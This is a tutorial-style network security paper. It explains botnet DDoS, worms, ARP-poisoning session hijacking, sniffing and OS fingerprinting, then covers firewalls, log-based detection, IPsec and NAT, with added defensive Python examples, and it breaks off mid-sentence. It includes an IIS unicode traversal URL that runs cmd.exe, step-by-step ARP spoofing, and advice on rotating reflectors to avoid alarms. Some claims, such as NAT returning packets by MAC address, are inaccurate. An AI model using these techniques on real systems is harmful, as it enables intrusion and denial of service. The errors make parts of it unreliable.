Bot / Trojan DrDOS Attack
Recently many IRC bots and trojan servers have found their way onto users' home computers via email, .exe binding etc. They are just backdoors to any system they have infected. If you really want to read into this go to www.grc.com; this guy knows a lot about these attacks because he was the target of one. These bots infect a machine and join an IRC server and a private channel. It's an army of zombies collecting in a room. The attacker enters the room and can issue commands to the army of bots to attack a target anywhere he wants, with any kind of attack he wants to use. This type of lameness can be easily stopped with a home firewall like Zone Alarm denying internet access to the bot, or a good virus scanner; both should come standard with every operating system. But you will have to email Bill Gates about that one. The attack itself is a bit like bandwidth hogging. When the bots flood the target directly it is a plain DDoS; when they bounce their spoofed packets off third-party servers as in the previous section the term is DrDoS (Distributed Reflected Denial of Service). Another analysis of the attack is below.
Not to go into much detail about this one, however it must be said, this attack type is full power and if used in the wrong hands could and most likely will cause serious damage to the host attacked. Like above, the attack all depends on the amount of zombies the hacker has. For example, if a hacker had 30,000 infected zombies (bots) each with an upstream of 1024 kbit/s, that's roughly 30 Gbit/s of aggregate upstream. Aimed at a web host for about 10 minutes that's on the order of 2 terabytes of traffic, enough to take down some of the leading web hosts, and even if the IPs are blocked the router still has to receive every packet before it can say no to it, so by now you should see the problem. The fact is home users should be targeted to prevent these attacks at the source.
Once you open the bot/trojan it secretly logs you into an IRC room, where the hacker can send group commands to all his bots. Keep protected with firewalls, such as "Sygate" www.sygate.com, and anti-trojan systems such as "The Cleaner" www.moosoft.com.
Worm Attack
Worms are a special 'breed' of programming. They're advanced and very sophisticated. The recent SQL worm we saw (Slammer, January 2003) shows how a worm's spreading is itself a DOS attack on the networks it infects. The worm did not damage files or anything like that; it just kept trying to find other servers to infect. It fit in a single small UDP packet (376 bytes) aimed at the SQL Server resolution service on port 1434, and because UDP needs no handshake each infected host could spray those packets at random addresses as fast as its link allowed. The result was that the networks it was on became flooded with UDP packets, denying service to legitimate clients, and backbone links and routers fell over under the scanning load alone. A worm can also act like a bot or trojan server, in which, when it infects the target, it instantly begins to attack a pre-programmed target. It's a deadly race to clean these worms, because the target may never be free of the attack if the worm infects enough people. This was the case with the Code Red worm, which carried a built-in flood against a fixed IP address (that of the White House web site). I suggest reading about the Code Red worm on the internet as it is very interesting :]
Unicode Ping Flood
This attack is native to the unicode (directory traversal) bug found in many unpatched IIS 4.0 and 5.0 web servers. Here's a sample:
http://imnotsecure.com/scripts/images/..%c0%af..%c0%af..%c0%afwinnt/
system32/cmd.exe?/c+ping+10.10.10.10-n+1000+-l
OK this is one of MANY unicode strings that are possibly useful on a vulnerable server. But you see the unicode bug: the overlong UTF-8 encoding %c0%af decodes to "/" only after IIS has already done its path check, so the ..%c0%af.. sequence escapes the web root and reaches the command shell on the target host. The URL then issues the command to ping 10.10.10.10 (the -n count sets how many echo requests are sent, 1000 here, and -l sets the byte size of each one; the value for -l is missing from the sample above). Now these packets aren't spoofed but they are still traffic, and with enough vulnerable machines the traffic volume begins to build up. And because the source addresses are real, it is the owners of those IIS boxes who get the blame.
Phasing
This section is very small; it's on the topic of phasing. Phasing is a very simple yet very effective method of using DOS attacks without setting off alarms at a router somewhere for the volume of packets the attacker is sending. I will only give one example attack with this method since it is sort of self explanatory after you read it once. Let's take the DRDOS attack. You're sending spoofed SYN packets at servers all over the internet. Well, without breaking a sweat you could code a program in C that simply switches the servers you are deflecting off of every 3-4 minutes. It takes the server roughly that long to stop retransmitting SYN/ACK packets when it doesn't receive any ACK in return from your victim (the retransmission timer doubles on every try, so five retries add up to a few minutes). So after the 3 or 4 initial minutes of the attack you begin to phase your attack to a different server, and your packets take a different route. You could phase your attack over a group of 25 servers or a group of 1000 servers, attacking with 5 at a time, and switching every 4 minutes. Each reflector sees only a short burst that stays under any per-source threshold, so this method of attacking is very effective and doesn't raise any alarms. Which is not good.
TCP Hijacking
3 way handshake
[client] --> SYN (seq = 100) --> --> [target]
[client] <-- SYN/ACK (seq = 300) (ack = 101) <-- [target]
[client] --> ACK (seq = 101) (ack = 301) --> [target]
[client] --> ACK (seq = 101) (ack = 301) -DATA-DATA- -->--> [target]
Above is the basic three way handshake, according to design. Now there are different types of TCP hijacking. There are attacks where the attacker can actually issue commands, as the victim, to a server. This requires knowing the next sequence numbers the server is expecting from the client. This is difficult blind, but not impossible, and trivial if you can sniff the session. And then there is passive sniffing of the traffic intended for the victim. In this method the valid traffic, after being sniffed and saved by the attacker, is all forwarded to the real client. This largely avoids detection; the attacker's machine just looks like another router. Now this is done by changing the victim's or server's ARP table. Because ARP replies never cross a router, this attack is limited to the attacker's own subnet; hijacking a session across the internet requires sequence number guessing, or control of a router on the path, instead.
Let's say server1 has a connection going with client1. The attacker would
ping his victim, client1, capture the ICMP data and extract his MAC address
from it. Armed with that MAC address, the attacker creates a spoofed ARP
packet and sends it to the server. The server receives the ARP packet and
changes its ARP table. Now it thinks that client1's MAC address belongs to a
new IP address, the IP address of the attacker. When the server constructs its
packets to be sent to client1, it compares the MAC address in its packets to
its ARP table as they pass through the network layer of the OSI model. It
matches up the MAC address with the IP address of the attacker, and the
traffic is sent off directly to the attacker. To avoid detection, the attacker
redirects the valid traffic, after logging it, to client1. Now the attacker's
machine looks like another router, almost unnoticeable to the average end
user. This is called passive sniffing. It will only last until the server has
updated its ARP table. We can complicate matters and change the client's ARP
table too, so it sends its ARP requests to the attacker first, where he drops
the packets. Server and client then never update their ARP tables, and the
continuous flow of data between them is logged by the attacker.
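The ARP-table change described above is what ARP monitors such as arpwatch look for. This is an added example, not code from the paper: it replays a constructed list of ARP replies and flags an IP whose MAC changes, and a MAC that turns up claiming a second IP (the spoofed reply that pairs client1's MAC with the attacker's IP). All addresses are constructed.

```python
from dataclasses import dataclass, field

@dataclass
class ArpMonitor:
    """Track IP<->MAC bindings seen in ARP replies and alert on anomalies."""
    ip_to_mac: dict = field(default_factory=dict)
    mac_to_ips: dict = field(default_factory=dict)
    alerts: list = field(default_factory=list)

    def observe(self, sender_ip: str, sender_mac: str) -> list:
        """Record one ARP reply (sender IP/MAC) and return any new alerts."""
        new_alerts = []
        mac = sender_mac.lower()
        known = self.ip_to_mac.get(sender_ip)
        if known is not None and known != mac:
            # Classic poisoning: a host we know now answers from another MAC.
            new_alerts.append(f"CHANGED {sender_ip}: {known} -> {mac}")
        self.ip_to_mac[sender_ip] = mac
        ips = self.mac_to_ips.setdefault(mac, set())
        if ips and sender_ip not in ips:
            # The scenario in the text: one MAC suddenly claims a second IP.
            new_alerts.append(
                f"FLIP-FLOP {mac} now also claims {sender_ip} (had {sorted(ips)})")
        ips.add(sender_ip)
        self.alerts.extend(new_alerts)
        return new_alerts

# Constructed sample traffic: legitimate replies first, then a spoofed reply
# pairing client1's MAC with the attacker's IP, then one that moves client1's
# IP onto a new MAC.
SAMPLE_REPLIES = [
    ("192.0.2.10", "00:11:22:33:44:55"),   # client1 (constructed)
    ("192.0.2.1",  "00:aa:bb:cc:dd:ee"),   # server1 (constructed)
    ("192.0.2.10", "00:11:22:33:44:55"),   # client1 again, nothing changed
    ("192.0.2.66", "00:11:22:33:44:55"),   # attacker's IP with client1's MAC
    ("192.0.2.10", "de:ad:be:ef:00:01"),   # client1's IP now on another MAC
]

def run_monitor(replies=SAMPLE_REPLIES) -> list:
    """Feed the replies through the monitor and return every alert raised."""
    mon = ArpMonitor()
    for ip, mac in replies:
        mon.observe(ip, mac)
    return mon.alerts

if __name__ == "__main__":
    for alert in run_monitor():
        print(alert)
```

On a real LAN, DHCP lease changes also trip the CHANGED rule, so the alerts are a prompt to look, not proof of an attack.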
Sniffing
There are different ways to 'sniff' the traffic of other machines. One way
was described above, using the ARP method to redirect someone else's specific
traffic to your own machine. That method only allows you to sniff the
particular traffic you were looking for. But on a local subnet, say at your
work or home, if you run a sniffer you can see ALL the traffic on the wire.
This includes every protocol. This is called promiscuous sniffing. A packet
sniffer works by capturing (copying) all the data on the wire. The traffic
still reaches its legitimate target, but you are viewing a copy of the raw
packet in your packet sniffer. Packet sniffers usually dump the packet in the
form of a hex dump because it is easy to decipher and manipulate. Using a
packet sniffer can be very useful: you can run your sniffer and ping a victim.
This captures the return ICMP packet, and an attacker can extract his victim's
MAC address from that data. A MAC address is very easy to pull from a hex dump
because it is in hex form to begin with. Some newer programs will even allow
you to reassemble the packets and recreate what they were intended for. This
is easier when reconstructing, say, HTTP packets than just a few TCP packets
containing your MP3 data; the HTTP data is easier to reassemble. Another form
of packet sniffing may be much more intrusive. An attacker can install a
sniffer by remotely breaking into a machine. The attacker sets the sniffer to
only pick up plain text logins and passwords it finds in packets. Then he
returns a few weeks later to retrieve the data the sniffer has found. This
type of sniffing is the most dangerous because the attacker has full access to
every single packet your machine generated and received since the sniffer was
installed.
Scans
Scans are the most common thing on the internet. The average broadband
customer receives up to 40 scans within the first three days of owning their
new connection. There are 2 types of scans, port scans and vulnerability
scans. A port scan is very basic but imperative to an attack for gathering
information on your machine. A port scanner sends a SYN packet to each port
specified by the attacker on the victim's machine. If that port is open and
there is a daemon / service running, it returns a SYN/ACK packet and the port
scanner reports that port as 'open'. A firewall would pick up on the
individual packet shape of the request for a certain port, send no ACK back
and possibly terminate or refuse the connection. Certain port scanners like
Nmap are extremely advanced and have options to stealth scan, or not to ping
the host. A vulnerability scanner scans an IP address for ports as well, but
it goes beyond that. The vulnerability scanner attempts to scan the services
running on the open ports for known vulnerabilities. Most scanners are made
for administrators to harden their security, but these tools are easily
available to attackers. A typical vulnerability scanner will scan a website
for known unicode bugs, buffer overflows, and weak passwords among many other
things. Now it's not illegal to scan any IP address, but it is most likely the
sign of an attack in the making. These types of vulnerability scans can also
fill up a target's log files very quickly.
Information Gathering / Finger Printing
Before attempting to gather information on a remote target it's important to
build an information database on each of the possible OSes the attacker's
target could be running, such as identifier values, TTL, TOS, and the
services the OS could be running by default. Use this database to compare
against the results you build up using various methods. Some of the simple
"banner grabbing" methods work very well, but there are more stealthy methods
as well: TCP/IP fingerprinting. Both methods are described.
Information gathering is an essential part of any attacker's plan. But this
can't always be done with neat little applications; it takes brains and skill
if the attacker does not want to be caught. Before attempting to gain root
access on a remote box an attacker must know what he's attacking. Different
operating systems are like night and day; they all have different security
holes and vulnerabilities. The attacker has probably already done a port scan
on his target. Let's say for the sake of argument he has found port 21 (ftp)
and port 80 (http) open. Now he wants to know what version of FTP and what web
server his target is running. This is easy information gathering.
$ ftp 10.10.10.10        <-- victim's IP
And it should return what version of FTP daemon it is.
Finding out the target's web server and version is just as easy.
$ telnet 10.10.10.10 80
GET / HTTP/1.1
(there are many variations of this banner grabbing)
This will return an HTTP header with the type and version of the web server.
If it's IIS the attacker looks at the version # and can instantly tell what
version of WinNT or 2000 it is running. This method can be used on the FTPD
port the target is running also.
Now the attacker just heads off to google.com to search for vulnerabilities
in the software the victim is running. It's that simple; yes, very lame, and
it doesn't take much skill. But there is skill to information gathering. An
attacker who didn't want to draw the site admin's attention to himself would
use a different way of gathering this information. From one simple ICMP
ECHO_REPLY a skillful attacker can read the values in the packet data to
determine the OS type. There are identifier bits in packets. Here are a
couple of examples of identifier values for Windows machines.
Microsoft Windows NT - 256
Microsoft Windows 98/98SE - 512
Microsoft Windows 2000 - 512
Microsoft Windows ME - 768
Microsoft Windows 2000 Family with SP1 - 768
Microsoft Windows XP - 512
These are the values different Windows machines will return. *NIX machines
return all different sorts of values as well; you will have to do more
research on the value you get and match it up with your prepared OS
information database.
The TTL value in a packet specifies how many hops the packet can travel
before being dropped or recreated. The TTL value is another form of OS
detection: a Windows box will return a TTL of 128, whereas a Redhat box will
return a value of 64. Routers and switches will return a low value as well,
usually around 64. These are small examples of TCP/IP stack fingerprinting.
It's forensic work on a much smaller scale than running a vulnerability
scanner on a target and alerting the admins that the attacker is inspecting
them. Much can be told from examining one packet. The data inside the packet
is irrelevant; the IP headers generated by the target are what you need to
examine. Every OS has its own way of forming these headers and values.
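The sniffing section says a MAC address is easy to pull out of a hex dump, and the paragraphs above say the IP header values (ID, TTL) are what a single echo reply gives away. The added example below, which is not code from the paper, dissects a constructed hex dump of an Ethernet/IPv4/ICMP echo reply, verifies both checksums, and maps the TTL and IP ID to the families the text lists; the frame, addresses and the decremented-TTL assumption are this example's own.

```python
import struct

# Constructed hex dump: an ICMP echo reply from 10.10.10.10 to 192.0.2.5,
# shown in the "offset  bytes" layout tcpdump-style tools print.
HEX_DUMP = """\
0000  00 11 22 33 44 55 00 aa bb cc dd ee 08 00 45 00
0010  00 3c 02 00 00 00 80 01 62 a8 0a 0a 0a 0a c0 00
0020  02 05 00 00 55 5a 00 01 00 01 61 62 63 64 65 66
0030  67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76
0040  77 61 62 63 64 65 66 67 68 69
"""

def hexdump_to_bytes(dump: str) -> bytes:
    """Drop the offset column at the start of each line, decode the rest."""
    tokens = []
    for line in dump.splitlines():
        parts = line.split()
        if parts:
            tokens.extend(parts[1:])        # parts[0] is the offset, not data
    return bytes.fromhex("".join(tokens))

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; returns 0 when the stored checksum verifies."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_frame(frame: bytes) -> dict:
    """Dissect Ethernet II + IPv4 + ICMP and return the interesting fields."""
    dst, src = frame[0:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:
        raise ValueError(f"not IPv4: ethertype 0x{ethertype:04x}")
    ip = frame[14:]
    ver_ihl, tos, total_len, ident, _frag, ttl, proto, _chk, s, d = \
        struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or total_len > len(ip):
        raise ValueError("bad IPv4 header")
    if inet_checksum(ip[:ihl]) != 0:
        raise ValueError("IP header checksum mismatch")
    return {
        "src_mac": mac_str(src), "dst_mac": mac_str(dst),
        "src_ip": ".".join(map(str, s)), "dst_ip": ".".join(map(str, d)),
        "ip_id": ident, "ttl": ttl, "tos": tos, "proto": proto,
        "icmp_type": ip[ihl], "icmp_code": ip[ihl + 1],
        # The ICMP checksum covers header and payload up to the IP total length.
        "icmp_checksum_ok": inet_checksum(ip[ihl:total_len]) == 0,
    }

def guess_os(ttl: int, ip_id: int) -> str:
    """Coarse guess from the TTL and IP ID values the text lists. A TTL seen
    on the wire has been decremented per hop (assumption), so 65..128 is read
    as a 128 start value (Windows) and 1..64 as a 64 start value (Redhat,
    routers)."""
    if 64 < ttl <= 128:
        hint = {256: "NT", 512: "98/2000/XP", 768: "ME/2000 SP1"}.get(ip_id, "unknown")
        return f"Windows (ID hint: {hint})"
    if 0 < ttl <= 64:
        return "Unix-like or router"
    return "unknown"
```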
Telnet is probably the best way of remote OS detection. If the attacker's
target has a telnet daemon running and he attempts to connect to it, he
doesn't even need to log on with the proper credentials to see what OS and
version you are running. For example:
$ telnet 10.10.10.10
Red Hat Linux Release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
This is probably the most obvious form of remote OS detection. It's among the
basic "banner grabbing" methods.
Finally I just want to suggest a tool on this topic, NMAP. NMAP can perform
remote OS detection through various TCP/IP stack fingerprinting methods.
There are command line and GUI versions; it's very reliable and dependable.
NMAP is just the first in a long line of tools available to you on the
internet, but most of them use the same methods described above, TCP/IP stack
fingerprinting. Some OSes can produce the same results as another OS, and
this can make it even harder to make an accurate guess at the OS. But this
will eventually lead to better ways of detection.
Protecting yourself against the packet attacks described a few paragraphs
above can be simple or hard depending on how you want to go about it. You
must take into consideration your network topology as well, the way it is
physically and logically set up. If you are running a webserver on port 80
then this port will be a sitting duck for SYN attacks. Unfortunately TCP/IP
wasn't designed to be secure. This port needs to be open in order to accept
legitimate SYN/ACK and HTTP packets among many others. But you can still
protect your network by installing basic firewalls. Firewalls are software or
hardware that can be configured to allow and block certain specified network
traffic. Firewalls are imperative for networks with machines behind them on a
LAN, as well as for stand-alone machines. Configuring your firewall is easy:
first you need to examine the traffic you must allow in order for people to
access your website or FTP server. At this point you may want to block the
rest of the traffic. This isn't always a smart move. Outbound firewalls are
usually only applied in a business environment when you want to restrict
access to certain websites outside of the LAN. If every machine on your LAN
is trusted, or it's your home network, then applying outbound firewalls may
not be a good idea. It all depends on your situation. Outbound application
blocking is however important in a home environment. A free firewall like
Zone Alarm provides an excellent application blocking feature. You supply the
firewall with a list of applications that can access the network; this blocks
trojans and worms from spreading or communicating with the attacker over the
internet. Inbound firewalls on the other hand must be hardened to secure your
internal machines. Blocking all ICMP traffic would stop your attacker from
receiving an ECHO_REPLY packet when he pings your IP address. But ICMP is
sometimes very useful for error correction and network connectivity testing.
Your firewall can also be configured to detect a flood of traffic. Let's say
your web server isn't hosting any applications for download. It's a simple
web page designed to update your viewers on current news and things happening
in your business. This means there wouldn't be much traffic flowing between
you and your viewers besides the normal HTTP packets. You can configure your
firewall to stop responding to a certain IP address after your server
receives 'X' packets from it in 'Y' amount of time.
Above we talked about the Smurf attack. The attacker uses your router in
order to broadcast these massive amounts of packets throughout your subnet.
By default these routers are set to broadcast the traffic that hits their
network address of .255. Stopping this can be as simple as disabling that
feature! Yes my friends, these precautions seem almost ridiculous. You must
be thinking anyone that doesn't do this the second they set their machines up
is truly dense. But these attacks happen every day, all over the internet.
Default installs will be the death of the internet.
Many of the DoS attacks above have no perfect solution to stopping them. It's
a game of wits; outsmarting your attacker is the best way to stop these
attacks from happening. Keeping your software up to date and your hardware
configured correctly is the best way to secure your network. Regularly
running vulnerability scans and attempting to exploit and break your own
network is the best way to protect it from malicious attackers.
Attack Detection
Detecting attacks on your network is quite easy. In the event of a DDoS
attack you will most likely notice your internet connection is dead. The only
traffic that moves fast is the traffic inside of your network, depending on
the attack. Then there are the physical signs: your switches or routers are
all lighting up like a Christmas tree. Your firewall logs are the best place
to go when you think you are the target of an attack. Here are some lines
from my router's firewall log with the original IP address changed to hide
the real attacker's IP address.
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 21
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 23
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 443
This is an example of someone port scanning me for open ports. This type of
thing is easy to pick out of your logs because of how neat and clean it is.
It's obviously someone sending one SYN packet to each port he wants to check
on your machine. These logged attempts are usually right next to one another.
Now a SYN attack would most likely look similar to these logs, except they
would all be directed towards the same port and the source IP would look
obviously fake, such as 1.1.1.1:
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
This would most likely be a SYN flood trying to kill my web server. To stop
this attack you can configure your firewall to stop receiving packets from
1.1.1.1. The attacker may just choose another source address when he realizes
what you've done, but this gives you enough time to prepare yourself.
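The two log patterns above (one source touching many ports versus many hits on one port) and the firewall's 'X packets in Y time' rule from the earlier paragraph can be turned into a small log classifier. This is an added example, not the paper's code: it parses the two-line entry format shown above, with constructed log lines, and the thresholds (3 distinct ports, 5 hits in 10 seconds) are this example's own assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Log format of the router firewall shown in the text: a timestamp line
# followed by an "Unrecognized access" line.
ENTRY_RE = re.compile(r"Unrecognized access from (?P<ip>[\d.]+):\d+ "
                      r"to TCP port (?P<dport>\d+)")
TS_FORMAT = "%A, %B %d, %Y %I:%M:%S %p"

# Constructed sample in that format: a port scan, a SYN flood, one normal hit.
SAMPLE_LOG = """\
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 21
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 23
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 443
Friday, February 21, 2003 5:40:01 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:40:01 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:40:02 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:40:02 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:40:03 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 6:10:00 PM
Unrecognized access from 203.0.113.7:51000 to TCP port 80
"""

def parse_log(text: str) -> list:
    """Pair each timestamp line with the access line after it -> (ts, ip, port)."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    events = []
    for ts_line, msg_line in zip(lines[0::2], lines[1::2]):
        m = ENTRY_RE.search(msg_line)
        if m:                             # skip unrelated log lines
            events.append((datetime.strptime(ts_line.strip(), TS_FORMAT),
                           m["ip"], int(m["dport"])))
    return events

def classify(events: list, scan_ports: int = 3, flood_x: int = 5,
             flood_y: timedelta = timedelta(seconds=10)) -> dict:
    """Verdict per source: many distinct ports = port scan; flood_x hits on
    one port within flood_y = SYN flood (the firewall's X-in-Y rule)."""
    by_src = defaultdict(list)
    for ts, ip, dport in events:
        by_src[ip].append((ts, dport))
    verdicts = {}
    for ip, hits in by_src.items():
        ports = {dport for _, dport in hits}
        if len(ports) >= scan_ports:
            verdicts[ip] = f"port scan ({len(ports)} ports)"
            continue
        verdicts[ip] = "normal"
        for port in ports:
            times = sorted(ts for ts, dport in hits if dport == port)
            # Sliding window: hits i..i+flood_x-1 all fall inside flood_y.
            for i in range(len(times) - flood_x + 1):
                if times[i + flood_x - 1] - times[i] <= flood_y:
                    verdicts[ip] = f"SYN flood candidate on port {port}: block source"
                    break
    return verdicts
```

Blocking the flagged source is only a stopgap, as the text says: a flood with spoofed addresses simply moves to another source, so the verdict is the cue to start collecting evidence, not the end of the response.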
Another way of detecting these attacks is to run a packet sniffer. Download
the Ethereal packet sniffer from www.ethereal.com and set the filters to only
pick up ICMP traffic. Ethereal doesn't have a huge buffer to hold the
captured data, so when it begins to grow large, thousands of ICMP packets,
it's time to stop capturing and examine the packets. These logs are useful to
save in order to show the authorities or your ISP, so they can track down the
attacker. A normal ping program produces an ICMP packet every few seconds. An
ICMP attack will usually flood your wire with over 5000 packets in just under
10 seconds.
Intrusion Detection
Intrusion detection is easy as well, and will almost always help you catch
your attacker if you are smart enough about it. On a normal Linux box the
most important logs are kept in /var/log and /var/log/httpd by default. The
logs you should look at are 'messages', 'secure', and 'access_log' in the
httpd folder. These will accurately log who used what service on your
machine. Usually an attacker will delete these logs upon leaving your
machine. That's why you should create backups and alternative places to log
these files. Make it harder for the attacker to find these files, in the hope
that he will give up and you will have logged his real IP address. Let's take
a look at one of these logs from my machine.
[/var/log]$ pico secure
Feb 17 15:28:58 xinetd : START: telnet pid=10008 from=10.10.10.10
10.10.10.10 being the attacker's IP address. This tells me exactly when he
logged on to my telnet daemon. By default my RedHat 7.3 machine is set to
email my root account whenever my FTP or telnet daemon is accessed. These
mails are kept in /var/mail. Let's take a look (deleting the email headers,
they are irrelevant).
[/var/mail]$ pico root
--------------------
connections:
Service telnet:
10.10.10.10: 2 Time(s)
--------------------
This mail also logs unsuccessful attempts at breaking your passwords. If a
brute force program is used to break in, your log file may become too large
to read. So it is imperative you read these logs daily and sift through them
for possible attacks.
IPSEC
IPSEC is a protocol that encrypts packet headers and data. IPSEC works by
exchanging packets on the IP layer. It supports two modes of encryption,
tunnel and transport. Tunnel mode encrypts both the data and the IP header,
whereas transport mode only encrypts the data of the packet. IPSEC was
designed to implement VPNs. The sender and receiver of the packets both share
a public key to decrypt the packets. IPSEC ensures the validity of your data,
and that even if sniffed, it is worthless to the attacker. For more on IPSEC
please visit this page: http://www.netbsd.org/Documentation/network/ipsec/
NAT as a means of security
This next part is copied from my tutorial on NAT. I think NAT plays a
substantial part in our networks' security and I have decided to add my
other work on NAT to this paper.
user1 (200.200.200.1) -----\
                            \
user2 (200.200.200.2) -------|NAT server|----- 100.10.2.3 (internet side)
                            /
user3 (200.200.200.3) -----/
Now let's pretend the 100.10.2.3 address is a valid internet address on the
backbone of the network. The three users are using 3 DHCP-assigned
addresses. They would not be valid IPs on the internet. But their packets go
through the NAT router where their packet headers are stripped and replaced
with the 100.10.2.3 valid IP header. This is a vague description of how this
works, but it should give you a grasp of what NAT is. Why is NAT good for
security? What is easier to defend, one point of entry or a thousand points
of entry? Of course one. NAT allows hundreds of machines to access the
internet via one address. At this one address it is much easier to construct
a firewall and keep intruders from seeing your internal network. At this one
access point we can set up different protocols allowing our outside employees
to reach the internal network with the proper authentication. This doesn't
have to be done on each internal machine because there is only one entry
point instead of thousands. How do exiting packets return to their source?
Easy: the NAT router does not strip the MAC address from the packets. So when
user1 sends an ICMP echo request to, let's say, yahoo.com, NAT strips the
200.200.200.1 IP address but does not strip the MAC (media access control)
hex number from the packet. So when the packet is returned the NAT router can
check its ARP (address resolution protocol) table and send the packet to the
right internal machine.
This brings us to the web security of NAT. Most webpages use dynamic
databases now, using Java or CGI scripts. They must be connected to some sort
of database within the internal network where the average websurfer can't
reach. But how are his packets supposed to reach that data? NAT takes the
incoming packets and reads their destination port. Once the packet is inside
the firewall, NAT uses port forwarding and forwards the packet to the
specific internal machine containing the database. As the packet exits the
firewall on its way back to the user it is rewritten again to look like the
firewall sent it. So you can see how NAT can help secure your webserver.
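The "one point of entry" argument and the port-forwarding behaviour above can be shown with a toy NAT router. This is an added example, not from the NAT tutorial: outbound packets get the public address, replies come back to the inside host, a published port is forwarded and its reply rewritten to look like the firewall sent it, and anything else from outside is dropped. Return traffic is matched with a per-connection port mapping here, a simplification this example assumes rather than the MAC-based description in the text; the internal server 200.200.200.50 and the outside addresses are constructed.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int

class NatRouter:
    def __init__(self, public_ip: str, forwards: dict, first_port: int = 40000):
        self.public_ip = public_ip
        self.forwards = forwards        # {public dst port: (inside ip, port)}
        self.next_port = first_port
        self.table = {}                 # {public src port: (inside ip, port)}
        self.reverse = {}               # {(inside ip, port): public src port}
        self.dropped = []

    def outbound(self, pkt: Packet) -> Packet:
        """Inside -> internet: rewrite the source to the one public address."""
        key = (pkt.src_ip, pkt.src_port)
        if key not in self.reverse:     # first packet of a new connection
            self.reverse[key] = self.next_port
            self.table[self.next_port] = key
            self.next_port += 1
        return Packet(self.public_ip, self.reverse[key], pkt.dst_ip, pkt.dst_port)

    def inbound(self, pkt: Packet):
        """Internet -> inside: a reply, a port-forward rule, or dropped."""
        if pkt.dst_ip != self.public_ip:
            self.dropped.append(pkt)
            return None
        if pkt.dst_port in self.table:          # reply to an inside host
            ip, port = self.table[pkt.dst_port]
            return Packet(pkt.src_ip, pkt.src_port, ip, port)
        if pkt.dst_port in self.forwards:       # published service (web server)
            ip, port = self.forwards[pkt.dst_port]
            return Packet(pkt.src_ip, pkt.src_port, ip, port)
        self.dropped.append(pkt)                # unsolicited: no way in
        return None

    def reply_out(self, pkt: Packet) -> Packet:
        """Inside server -> user: rewrite so it looks like the firewall sent it."""
        for pub_port, (ip, port) in self.forwards.items():
            if (pkt.src_ip, pkt.src_port) == (ip, port):
                return Packet(self.public_ip, pub_port, pkt.dst_ip, pkt.dst_port)
        return self.outbound(pkt)

def demo() -> dict:
    """Walk the paper's scenario: user1 goes out, a surfer reaches the
    forwarded web server, and a probe at telnet from outside is dropped."""
    nat = NatRouter("100.10.2.3", forwards={80: ("200.200.200.50", 8080)})
    out = nat.outbound(Packet("200.200.200.1", 5555, "198.51.100.9", 80))
    back = nat.inbound(Packet("198.51.100.9", 80, "100.10.2.3", out.src_port))
    web = nat.inbound(Packet("198.51.100.20", 4444, "100.10.2.3", 80))
    web_reply = nat.reply_out(Packet("200.200.200.50", 8080, "198.51.100.20", 4444))
    probe = nat.inbound(Packet("198.51.100.20", 4444, "100.10.2.3", 23))
    return {"out": out, "back": back, "web": web, "web_reply": web_reply,
            "probe": probe, "dropped": len(nat.dropped)}
```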
NAT can also provide load balancing for webservers. Let's say you have a very
busy webserver. You get hits from all over the country every few seconds.
These packets are beginning to slow down the time in which your server can
respond. Using NAT we can forward certain packets to mirror servers, thus
making the load on the main server substantially smaller. NAT can separate
these packets by the shortest number of hops they have to travel to return to
their source and forward them to the appropriate mirror site. These mirror
sites can be physically located throughout the country. All of this is done
in seconds; the user never notices the new route their packet took.
So that is how NAT can play a very important role in your network's security.
NAT is just one of many protocols that can offer more security; NAT is
however used in all operating systems and networks.
The Future of TCP/IP
This chapter could be 50 pages long or it could be one paragraph, but we will
keep it short. TCP/IP was not designed to be a very secure means of
transporting data. It is easily manipulated and exploited to every attacker's
advantage. Perhaps IPv6 will bring more secure protocols with advanced
methods of transporting data and routing. In the past people have suggested
large centers in which data should be stored, encrypted, and then sent back
out again. But this is against the internet's original design; it creates a
central point. This just opens doors to all new types of attacks and loss of
